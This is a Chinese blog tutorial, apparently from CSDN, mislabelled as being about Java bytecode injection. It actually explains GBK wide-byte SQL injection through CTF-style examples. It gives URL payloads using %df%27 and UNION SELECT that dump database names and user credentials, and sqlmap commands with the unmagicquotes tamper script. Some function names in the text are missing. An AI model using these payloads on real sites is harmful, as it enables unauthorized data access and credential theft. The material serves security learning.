字节码注入/字节码注入原理java-零开始网络安全详细教程

于 2024-05-17 09:15:19 发布
阅读量261 收藏 7
点赞数 4
文章标签: 注入 字节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68974407/article/details/138992515
版权

字节码注入/字节码注入原理java-零开始网络安全详细教程

本文正在参加「金石计划 . 瓜分6万现金大奖」

前言

突然想起来之前讲SQL注入时忘记讲一下这个宽字节注入了,因为这个知识点还是挺重要的,所以本文就带大家了解一下宽字节注入的原理以及应用方法,下面由我来给大家详细讲解一下。

基础知识宽字节

在了解宽字节注入之前,我们要了解一下什么是宽字节,相对于单字节,我们引入一个字符数大小为两个字节的为宽字节,比如GBK编码,我们汉字通常使用的就是GBK编码,也就是说一次性会读取两个字节。

宽字节注入

产生宽字节注入的原因涉及了编码转换的问题,当我们的mysql使用GBK编码后,同时两个字符的前一个字符ASCII码大于128时,会将两个字符认成一个汉字,那么大家像一个,如果存在过滤我们输入的函数(()、ring()、()、)会将我们的输入进行转义,那么我们是不是可以尝试注入,我们举一个简单的例子:

addslashes()函数

该函数的作用是返回在预定义字符之前添加反斜杠的字符串。于是我们可以分析一下我们转入的参数流程:

假设我们传入一个参数id为1'查看数据库是否错报:

index.php?id=1'

那么经过函数过滤后我们的输入拼接到sql语句就会变成:

select * from user where id = '1''

可以看到单引号被转义了,加入我们像下面一样传参:

图片.png

可以看到我们传入的参数与\合并成了一个汉字,具体可以参考下图:

图片.png

可以看到我们的单引号没有被转义,从而达到了闭合单引号的效果,这就是一个简单的宽字节注入。但是需要有个前提,也就是MYSQL设置了GBK编码:

SET character_set_client =gbk

例子例题一

进入页面发现url可以有个变量id可以传入参数,于是我们传参测试是否报错

?id=1'

发现单引号被转义了,数据库没有进行错报,具体可以看下图:

图片.png

结合我们上面学习到的宽字节注入的知识,怀疑是函数转义了我们的单引号,于是我们尝试进行绕过,我们先查询列数:

?id=1%aa%27 order by 3--+

发现列数为三后,判断回显位置:

?id=-1%aa%27union select 1,2,database()--+

成功爆出了数据库的名字,于是后面操作就跟平常的SQL注入一样了:

?id=-1%aa%27union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+

图片.png

例题二

打开网页有一个查询框让我们进行查询,我们尝试加入单引号但发现没有报错,于是查看下源码看看有没有有用信息:

图片.png

正是汉字编码字符集,于是我们尝试宽字节注入:

?id=1%df%27%20union%20select%201,database()%23

成功回显了数据库的名字,说明可行,于是我们继续注入:

?id=1%df%27%20union%20select%201,string%20from%20sql5.key%20--%20

得到了我们想要查询的信息。

应用

作为一个强大的SQL注入自动化工具也是可以进行宽字节注入测试的,下面我们来学习一下利用走一遍宽字节注入的流程:

先跑数据库名:

sqlmap.py -u "http://sql/index.php?id=3" --tamper unmagicquotes --dbs

其中为利用中自带的脚本,当然我们也可以手动导入,而为我们宽字节注入利用的脚本,下面查询表名:

index.php?id=3" --tamper unmagicquotes -D 'xino' --tables

爆出来表名后爆列名:

index.php?id=3" --tamper unmagicquotes -D `xino` -T ctf --columns

之后我们爆出数据:

id=3" --tamper unmagicquotes -D `xino` -T ctf -C flag

中进行宽字节注入还是比较简单的,只需要注意我们利用到了的宽字节注入脚本,其他的跟平时注入并没有很大的差别。

结语

今天总结了一下宽字节注入的原理以及应用方法,整的来看宽字节注入的利用环境就是当我们的单引号被转义了不能进行注入时可以考虑利用宽字符的编码解析特性来进行单引号的逃逸,认真学习一下还是比较容易理解的,如果本文对你有帮助希望可以一键三连一下。

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

程序员三九
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java动态字节码注入技术
琅琊之榜
08-21 1232
Java动态字节码注入技术是一种在运行时修改Java字节码的技术。它允许开发者在程序运行期间动态地向现有的Java类中注入字节码,并改变类的行为和功能。这项技术通常用于实现AOP(面向切面编程)、代码增强、动态代理等需求。
使用ASM在Android中进行字节码注入
工宗浩生财指南针
06-15 1699
首先在visitMethod函数中找到OnClickListener的onClick方法(通过判断函数签名,函数名等找到特定函数)由于字节码的插桩具有一定难度,因此我们可以通过ASM Bytecode Viewer Support Kotlin这款插件来辅助。这里在Activity中加了一个点击事件,这次是将点击事件的方法体进行清除。然后在application的model下的gradle中应用插件。可以看到编译后的class文件中方法体已经清除了。然后我们需要在项目的gradle文件中进行引用。
读懂spring之以来注入源码分析
qq_24872115的博客
03-03 153
首先分两种:1. 手动注入2. 自动注入在XML中定义Bean时,就是手动注入,因为是程序员手动给某个属性指定了值。上面这种底层是通过set方法进行注入。上面这种底层是通过构造方法进行注入。这么写,表示Spring会自动的给userService中所有的属性自动赋值(不需要这个属性上有@Autowired注解,但需要这个属性有对应的set方法)。在创建Bean的过程中,在填充属性时,Spring会去解析当前类,把当前类的所有方法都解析出来,
Java ASM 框架:字节码操作的常见用法(生成类,修改类,方法插桩,方法注入
BASK2312的博客
12-26 2315
ASM 是一款读写Java字节码的工具,可以达到跳过源码编写,编译,直接以字节码的形式创建类,修改已经存在类(或者jar中的class)的属性,方法等。 通常用来开发一些Java开发的辅助框架,其做法是在你编写的Java代码中注入一些特定代码(俗称字节码插装)达到特定目的,以Android开发为例最常用的方法通过字节码插装实现热修复,事件监听,埋点,开源框架等非常规操作,当然在Android开发中通常辅以Gradle插件一起使用,这个改天在写。早就听说过ASM和字节码插桩技术,但是工作中很少直接使用,因为近
Skywalking 的字节码注入技术到底是啥?
hugo_lei的博客
07-21 3081
Skywalking 使用的是Java 动态字节码技术 对 Debug 的好奇 初学 Java 时,我对 IDEA 的 Debug 非常好奇,不止是它能查看断点的上下文环境,更神奇的是我可以在断点处使用它的 Evaluate 功能直接执行某些命令,进行一些计算或改变当前变量。 刚开始语法不熟经常写错代码,重新打包部署一次代码耗时很长,我就直接面向 Debug 开发。在要编写的方法开始处打一个断点,在 Evaluate 框内一次次地执行方法函数不停地调整代码,没问题后再将代码复制出来放到 IDEA 里,
ClassFinal-java class文件安全加密工具
06-19
Java安全涉及到多个层面,包括数据安全、代码安全、网络安全等。ClassFinal主要关注的是代码安全,它提供的功能有: 1. **加密**:ClassFinal能够对Java类文件进行加密,使原始字节码变得不可读。这种加密方式通常...
行业分类-设备装置-基于JAVA字节码插桩和JAVA方法挂钩检测JAVA沙箱逃逸攻击.zip
09-12
为了防止这种攻击,开发者可以利用Java字节码插桩和方法挂钩技术来增强应用的安全性。本文将深入探讨这两种技术以及如何在实际应用中使用它们来检测和防止Java沙箱逃逸攻击。 字节码插桩(Bytecode instrumentation...
Java-essentials:这是Java必不可少的程序
06-29
10. **Java虚拟机(JVM)**:Java程序首先被编译成字节码,然后在JVM上解释执行。JVM是Java跨平台的基石,通过“一次编写,到处运行”实现平台无关性。 11. **垃圾回收**:Java自动进行内存管理,当对象不再被引用...
打造最强的Java安全研究与安全开发面试题库,帮助师傅们找到满意的工作.zip
最新发布
10-03
Java安全研究与安全开发在IT行业中占据着至关重要的地位,特别是在网络安全日益严峻的今天。这份“打造最强的Java安全研究与安全开发面试题库”旨在为求职者提供全面的准备,帮助他们顺利通过面试,找到满意的工作。...
java-others
03-22
7. **JVM原理**:理解JVM如何加载类、执行字节码和内存管理,特别是垃圾回收机制,有助于优化程序性能。 8. **反射机制**:Java的反射API能动态获取类的信息并在运行时创建和调用对象,常用于框架和插件系统。 9. ...
java 字节码注入_日志注入(字节码增强)
weixin_39944515的博客
02-24 702
日志框架增强使用maven 依赖com.gizwitsLoggingAnnotation1.0在我们需要的方法上加上GizwitsLogging注解public class Logging {@GizwitsLoggingpublic void parse() {System.out.println("Logging.parse");}@GizwitsLoggingpublic Double pa...
JavaAgent 实现字节码注入
无界编程
07-27 5397
新建MyAgent项目 pom文件 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:sc...
神器之ByteBuddy,字节码注入分析代码执行性能
Rick的专栏
05-10 3764
前文 一路上看见晦涩难懂的ASM,小巧可人的Javassist。直到遇见了ByteBuddy才知世上竟有如此的冷艳简洁。 JavaAgent 从Jdk1.5开始Java开始支持Java Agent特性,可以通过premain方法,在Class字节码加载进虚拟机之前对底层的字节码进行修改。从而达到可以自定义特性的功能。给Aop的实现提供了一种更加简洁的方式。 ByteBuddy 字节码修改工具貌似从Java的诞生就一直存在,一开始的ASM,后来可以通过人类可以理解的方式修改字节码Javassist,到现在的
【无侵入】agent服务+javassist字节码操作
zb6340430的博客
07-20 596
简介 转载出自:http://blog.csdn.net/supera_li/article/details/45846175 对于agent,是在vm启动,执行方法前,将字节码修改的服务代理。 对于javassist,是修改字节码具体实现。  这两个结合有什么用啊?写测试框架,不仅局限于此。 对于字节码:  字节码处理工具,bcel,asm与虚拟机指令打交道。Javassist采用java编码...
字节码技术
art_code的博客
10-30 756
字节码技术 使用字节码技术对类的基本信息进行操作,对属性和方法进行修改。 字节码技术应用场景 AOP技术、Lombok去除重复代码插件、动态修改class文件等 字节技术优势 Java字节码增强指的是在Java字节码生成之后,对其进行修改,增强其功能,这种方式相当于对应用程序的二进制文件进行修改。Java字节码增强主要是为了减少冗余代码,提高性能等。 实现字节码增强的主要步...
SQL注入教程——(四)字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
java agent 动态字节码修改,无代码侵入(jar 启动时,启动后)
FREEDOM
09-25 1823
简要描述 java agent 技术 不同于AOP、不需要在原程序包中增加或者修改代码,而是单独做一个程序jar,实现对目标程序jar的修改,可以在jvm程序启动前、或者运行时 对类进行拦截、修改类中的实现(实际是修改jvm方法区中class字节码) 两种方式实现 (1)目标jar启动时修改 在 目标jar包启动时 使用命令 java -javaagent:xx-agent.jar -jar 目标程序.jar ,对目标程序进行修改。 (2)目标jar运行时修改 使用attach(目标jar运行的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值